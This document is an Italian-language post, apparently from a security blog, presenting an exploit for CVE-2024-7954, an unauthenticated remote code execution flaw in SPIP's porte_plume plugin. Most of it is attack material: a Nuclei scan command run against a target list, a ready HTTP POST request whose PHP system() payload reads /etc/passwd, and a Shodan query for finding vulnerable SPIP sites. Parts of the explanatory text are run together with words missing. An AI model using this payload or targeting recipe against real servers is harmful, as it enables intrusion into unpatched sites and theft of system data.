
Exploit per CVE-2024-7954: esecuzione remota di codice nel plugin porte_plume di SPIP. Include un template per la scansione con Nuclei e un dork di Shodan per identificare istanze vulnerabili.
Il plugin porte_plume, utilizzato dalle versioni di SPIP precedenti a 4.30-alpha2, 4.2.13 e 4.1.16, è soggetto a una vulnerabilità critica di esecuzione di codice arbitrario (RCE). Questo difetto consente a un attaccante remoto non autenticato di eseguire codice PHP arbitrario come utente SPIP creando una richiesta HTTP specifica. Il potenziale di sfruttamento è grave, poiché consente agli attaccanti di eseguire comandi malevoli sul server, che potrebbero portare ad accessi non autorizzati, violazioni dei dati o ulteriore compromissione del sistema.
##Nuclei Scan
kali@Dell:~/nuclei-templates-main/http/cves/2024$ nuclei -l targets -t /home/kali/nuclei-templates-main/http/cves/2024/CVE-2024-7954.yaml
Un esempio di richiesta HTTP costruita che può essere utilizzata per sfruttare questa vulnerabilità è il seguente:
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{Hostname}} -> IP
Content-Type: application/x-www-form-urlencoded
data=AA_[->URL<?php system('cat /etc/passwd'); ?>]_BB
POST è diretta all'azione porte_plume_previsu del file index.php di SPIP.system() di PHP per eseguire un comando (in questo caso, cat /etc/passwd), che legge il contenuto del file delle password.system(), un attaccante potrebbe eseguire qualsiasi codice PHP sul server, portando a conseguenze gravi.Per identificare installazioni SPIP potenzialmente vulnerabili, è possibile utilizzare la seguente query di ricerca Shodan:
app="SPIP"
Questa vulnerabilità sottolinea l'importanza di mantenere il software aggiornato e di implementare misure di sicurezza robuste per proteggersi dallo sfruttamento.